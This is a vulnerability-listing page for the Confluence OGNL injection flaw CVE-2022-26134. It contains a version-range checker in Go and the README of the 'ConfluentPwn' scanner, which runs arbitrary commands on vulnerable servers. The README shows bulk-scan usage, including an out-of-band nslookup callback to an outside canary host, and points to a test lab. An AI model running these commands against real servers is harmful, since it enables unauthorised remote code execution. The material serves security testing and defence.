
CVE-2022-26134 PoC — Atlassian Confluence Server Injection Vulnerability

Associated Vulnerability
Title: Atlassian Confluence Server Injection Vulnerability (CVE-2022-26134)
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
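The version ranges quoted in the description above are the part of this record a defender acts on first: given the version a Confluence instance reports, decide whether it falls inside one of the listed affected ranges. The following Go program is an added example written for this page, not code from the ConfluentPwn tool or its authors; the range table is transcribed from the description, and the function names (`parseVersion`, `compareVersions`, `IsAffected`) and the sample version strings in `main` are constructed for illustration.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// versionRange is a half-open interval [From, Before) of Confluence versions,
// matching the "from X before Y" wording of the CVE description.
type versionRange struct {
	From   string
	Before string
}

// affectedRanges is transcribed from the CVE-2022-26134 description above.
var affectedRanges = []versionRange{
	{"1.3.0", "7.4.17"},
	{"7.13.0", "7.13.7"},
	{"7.14.0", "7.14.3"},
	{"7.15.0", "7.15.2"},
	{"7.16.0", "7.16.4"},
	{"7.17.0", "7.17.4"},
	{"7.18.0", "7.18.1"},
}

// parseVersion turns a dotted version such as "7.13.6" into three numeric
// components; missing trailing components are treated as zero ("7.13" == 7.13.0).
// Anything that is not one to three non-negative integers is rejected.
func parseVersion(s string) ([3]int, error) {
	var v [3]int
	parts := strings.Split(strings.TrimSpace(s), ".")
	if len(parts) > 3 {
		return v, fmt.Errorf("bad version %q: too many components", s)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("bad version %q: component %q is not a number", s, p)
		}
		v[i] = n
	}
	return v, nil
}

// compareVersions compares component-wise and returns -1, 0 or 1.
// A numeric comparison is required: a string comparison would rank "7.4.17"
// below "7.4.2".
func compareVersions(a, b [3]int) int {
	for i := 0; i < 3; i++ {
		if a[i] < b[i] {
			return -1
		}
		if a[i] > b[i] {
			return 1
		}
	}
	return 0
}

// IsAffected reports whether version lies inside one of the listed ranges.
// The range endpoints are constants from the table, so their parse errors are
// ignored; the caller's input is validated and any error is returned.
func IsAffected(version string) (bool, error) {
	v, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	for _, r := range affectedRanges {
		from, _ := parseVersion(r.From)
		before, _ := parseVersion(r.Before)
		if compareVersions(v, from) >= 0 && compareVersions(v, before) < 0 {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	// Constructed sample versions: one inside and one just past each of three ranges.
	for _, v := range []string{"7.13.6", "7.13.7", "7.4.16", "7.4.17", "7.18.0", "7.18.1"} {
		affected, err := IsAffected(v)
		if err != nil {
			fmt.Println(v, "->", err)
			continue
		}
		fmt.Printf("%-8s affected=%v\n", v, affected)
	}
}
```

A `false` result means only that the version is not inside one of the ranges quoted in the description. Versions that fall between two listed ranges (for example anything from 7.4.17 up to 7.13.0) are not shown to be fixed by this check, so the vendor advisory remains the authority for those.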
Description
Atlassian Confluence unauthenticated OGNL injection remote code execution scanner (CVE-2022-26134).
Readme
# ConfluentPwn
Confluence pre-auth OGNL injection remote code execution scanner (CVE-2022-26134).

## Usage
The below GIF shows a demo usage of the tool:

![tooldemo](https://user-images.githubusercontent.com/39941993/172548712-6bf81497-99ec-48c2-b076-d8a472c85a1f.gif)


Here is the help output of the tool:
```
$ ./cfscan -h

  +-------------------------------+
  |    C O N F L U E N T P W N    |
  +-------------------------------+

[+] ConfluentPwn by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

Usage:
  -cmd string
        Command to execute on a vulnerable confluence server. (default "id")
  -file string
        Specify a file containing list of hosts to scan.
  -output string
        Output filepath to write the scan results into. (default "cfpwn-results.csv")
  -regex string
        Regex to match the response header for the command executed.
  -threads int
        Number of threads to use while scanning. (default 20)
  -timeout int
        HTTP timeout in seconds. (default 5)
  -user-agent string
        Custom user-agent string to use. (default "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36")

Examples:
  ./cfscan 1.2.3.4:80 1.1.1.1:8080
  ./cfscan -file urls.txt
  ./cfscan -cmd 'nslookup xxxxxxxxxxxxxxxxx.canarytokens.com 1.1.1.1:80'
  ./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Specifying targets
Targets can be specified in two ways:
- Specifying URLs directly via command line.
    ```
    ./cfscan target1 target2 ...
    ```
- Specifying a file containing a list of URLs to scan using the `-file` argument.
    ```
    ./cfscan -file targets.txt
    ```

### Concurrency, timeouts and user-agents
The maximum number of concurrent targets to be processed can be controlled using the `-threads` argument. The default concurrency value is 20.

The HTTP timeout value in seconds can be specified using the `-timeout` argument. The default timeout is set to 5 seconds.

A custom user-agent can be specified using the `-user-agent` flag, in case the user wants to track UA strings in their logs.

### Output
The output generated is written to a CSV file, the destination of which can be specified using the `-output` flag. The default output file generated is `cfscan-results.csv`.

The output contains 4 columns:
- target
- confluence version
- vulnerability status
- command output

### Command Specification & Matching
The command to be run on a vulnerable server is specified using the `-cmd` argument. The regular expression used to match the output of that command is specified using the `-regex` flag.

The default command is `id`, and the regex used to match its output is `uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)`.

Using the flags together looks like:
```
./cfscan -cmd 'id' -regex 'uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)' https://1.1.1.1
./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443
```

### Setting up a Test Environment
If you'd like to test out the tool or the vulnerability in general, then you can refer to this: [https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134).

The installation process is simple; the commands below do the job:
```
$ mkdir confluentpwn && cd confluentpwn && wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
$ docker-compose up -d
```
The app should now be available at `http://localhost:8090`.

### License & Version
The tool is licensed under the MIT license. See [LICENSE](LICENSE).
Currently the tool is at v0.1.

### Credits
The Research Team at [RedHunt Labs](https://redhuntlabs.com) would like to thank [vulhub](https://github.com/vulhub/vulhub) for providing the docker test image.

##### **[`To know more about our Attack Surface Management platform, check out NVADR.`](https://redhuntlabs.com/nvadr)**
File Snapshot

```
[4.0K] /data/pocs/650e6e6464858af3f78a6f83602a7ff54ccee9f1
├── [ 236] go.mod
├── [2.1K] go.sum
├── [1.0K] LICENSE
├── [4.7K] main.go
├── [4.1K] README.md
├── [1.8K] utils.go
└── [ 543] writer.go

0 directories, 7 files
```